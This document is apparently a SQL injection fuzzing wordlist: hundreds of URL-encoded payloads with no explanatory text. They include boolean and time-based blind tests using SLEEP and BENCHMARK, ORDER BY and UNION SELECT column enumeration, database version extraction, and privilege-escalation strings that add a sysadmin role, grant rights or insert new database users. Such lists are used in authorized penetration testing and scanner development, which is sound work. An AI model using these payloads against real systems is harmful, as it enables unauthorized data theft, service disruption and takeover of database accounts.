%20AND%205650%3DCONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)%2BCHAR(88)))%23
%20AND%207300%3D7300%20AND%20('pKlZ'%3D'pKlY
%20AND%207300%3D7300%20AND%20('pKlZ'%3D'pKlZ
%20AND%207300%3D7300%20AND%20'pKlZ'%3D'pKlY
%20AND%207300%3D7300%20AND%20'pKlZ'%3D'pKlZ
%20AND%207506%3D9091%20AND%20(5913%3D5913
%20AND%207506%3D9091%20AND%20('5913%3D5913
%20AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D0
%20AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D0--
%20AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D0%23
%20AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D1
%20AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D1--
%20AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D1%23
'%20exec%20sp_addsrvrolemember%20'name'%20,%20'sysadmin'%20--
'%20grant%20connect%20to%20name;%20grant%20resource%20to%20name;%20--
%20HAVING%201%3D0
%20HAVING%201%3D0--%20
%20HAVING%201%3D0%23
%20HAVING%201%3D1
%20HAVING%201%3D1--%20
%20HAVING%201%3D1%23
'%20insert%20into%20mysql.user%20(user,%20host,%20password)%20values%20('name',%20'localhost',%20password('pass123'))%20--
'%20insert%20into%20users(login,%20password,%20level)%20values(%20char(0x70)%20%2B%20char(0x65)%20%2B%20char(0x74)%20%2B%20char(0x65)%20%2B%20char(0x72)%20%2B%20char(0x70)%20%2B%20char(0x65)%20%2B%20char(0x74)%20%2B%20char(0x65)%20%2B%20char(0x72),char(0x64)
%20OR%201%3D0
%20OR%201%3D0--%20
%20OR%201%3D0%23
%20OR%201%3D1
'%20or%20'1'%3D'1
%20OR%201%3D1--%20
'%20or%201%3D1%20--
%20OR%201%3D1%23
%20OR%203409%3D3409%20AND%20('pytW'%20LIKE%20'pytW
%20OR%203409%3D3409%20AND%20('pytW'%20LIKE%20'pytY
%20OR%20x%3Dx
%20OR%20x%3Dx--%20
%20OR%20x%3Dx%23
%20OR%20x%3Dy
%20OR%20x%3Dy--%20
%20OR%20x%3Dy%23
%20ORDER%20BY%201%20
%20ORDER%20BY%201--%20
%20ORDER%20BY%201%23%20
%20ORDER%20BY%201,SLEEP(5)
%20ORDER%20BY%201,SLEEP(5)--%20
%20ORDER%20BY%201,SLEEP(5)%23
%20ORDER%20BY%201,SLEEP(5),3--%20
%20ORDER%20BY%201,SLEEP(5),3%23
%20ORDER%20BY%201,SLEEP(5),3,4--%20
%20ORDER%20BY%201,SLEEP(5),3,4%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A'))
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20
%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
%20ORDER%20BY%2010%20
%20ORDER%20BY%2010--%20
%20ORDER%20BY%2010%23%20
%20ORDER%20BY%2011%20
%20ORDER%20BY%2011--%20
%20ORDER%20BY%2011%23%20
%20ORDER%20BY%2012%20
%20ORDER%20BY%2012--%20
%20ORDER%20BY%2012%23%20
%20ORDER%20BY%2013%20
%20ORDER%20BY%2013--%20
%20ORDER%20BY%2013%23%20
%20ORDER%20BY%2014%20
%20ORDER%20BY%2014--%20
%20ORDER%20BY%2014%23%20
%20ORDER%20BY%2015%20
%20ORDER%20BY%2015--%20
%20ORDER%20BY%2015%23%20
%20ORDER%20BY%2016%20
%20ORDER%20BY%2016--%20
%20ORDER%20BY%2016%23%20
%20ORDER%20BY%2017%20
%20ORDER%20BY%2017--%20
%20ORDER%20BY%2017%23%20
%20ORDER%20BY%2018%20
%20ORDER%20BY%2018--%20
%20ORDER%20BY%2018%23%20
%20ORDER%20BY%2019%20
%20ORDER%20BY%2019--%20
%20ORDER%20BY%2019%23%20
%20ORDER%20BY%202%20
%20ORDER%20BY%202--%20
%20ORDER%20BY%202%23%20
%20ORDER%20BY%2020%20
%20ORDER%20BY%2020--%20
%20ORDER%20BY%2020%23%20
%20ORDER%20BY%2021%20
%20ORDER%20BY%2021--%20
%20ORDER%20BY%2021%23%20
%20ORDER%20BY%2022%20
%20ORDER%20BY%2022--%20
%20ORDER%20BY%2022%23%20
%20ORDER%20BY%2023%20
%20ORDER%20BY%2023--%20
%20ORDER%20BY%2023%23%20
%20ORDER%20BY%2024%20
%20ORDER%20BY%2024--%20
%20ORDER%20BY%2024%23%20
%20ORDER%20BY%2025%20
%20ORDER%20BY%2025--%20
%20ORDER%20BY%2025%23%20
%20ORDER%20BY%2026%20
%20ORDER%20BY%2026--%20
%20ORDER%20BY%2026%23%20
%20ORDER%20BY%2027%20
%20ORDER%20BY%2027--%20
%20ORDER%20BY%2027%23%20
%20ORDER%20BY%2028%20
%20ORDER%20BY%2028--%20
%20ORDER%20BY%2028%23%20
%20ORDER%20BY%2029%20
%20ORDER%20BY%2029--%20
%20ORDER%20BY%2029%23%20
%20ORDER%20BY%203%20
%20ORDER%20BY%203--%20
%20ORDER%20BY%203%23%20
%20ORDER%20BY%2030%20
%20ORDER%20BY%2030--%20
%20ORDER%20BY%2030%23
%20ORDER%20BY%2031337%20
%20ORDER%20BY%2031337--%20
%20ORDER%20BY%2031337%23
%20ORDER%20BY%204%20
%20ORDER%20BY%204--%20
%20ORDER%20BY%204%23%20
%20ORDER%20BY%205%20
%20ORDER%20BY%205--%20
%20ORDER%20BY%205%23%20
%20ORDER%20BY%206%20
%20ORDER%20BY%206--%20
%20ORDER%20BY%206%23%20
%20ORDER%20BY%207%20
%20ORDER%20BY%207--%20
%20ORDER%20BY%207%23%20
%20ORDER%20BY%208%20
%20ORDER%20BY%208--%20
%20ORDER%20BY%208%23%20
%20ORDER%20BY%209%20
%20ORDER%20BY%209--%20
%20ORDER%20BY%209%23%20
%20ORDER%20BY%20SLEEP(5)
%20ORDER%20BY%20SLEEP(5)--%20
%20ORDER%20BY%20SLEEP(5)%23
%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346%3D4346)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'%3D'
%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346%3D4347)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'%3D'
'%20union%20(select%20@@version)%20--
'%20union%20(select%20NULL,%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20NULL,%20(select%20@@version))%20--
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5)--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
%20UNION%20ALL%20SELECT%201
%20UNION%20ALL%20SELECT%201--%20
%20UNION%20ALL%20SELECT%201%23
%20UNION%20ALL%20SELECT%201,2
%20UNION%20ALL%20SELECT%201,2--%20
%20UNION%20ALL%20SELECT%201,2%23
%20UNION%20ALL%20SELECT%201,2,3
%20UNION%20ALL%20SELECT%201,2,3--%20
%20UNION%20ALL%20SELECT%201,2,3%23
%20UNION%20ALL%20SELECT%201,2,3,4
%20UNION%20ALL%20SELECT%201,2,3,4--%20
%20UNION%20ALL%20SELECT%201,2,3,4%23
%20UNION%20ALL%20SELECT%201,2,3,4,5
%20UNION%20ALL%20SELECT%201,2,3,4,5--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6
%20UNION%20ALL%20SELECT%201,2,3,4,5,6--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23
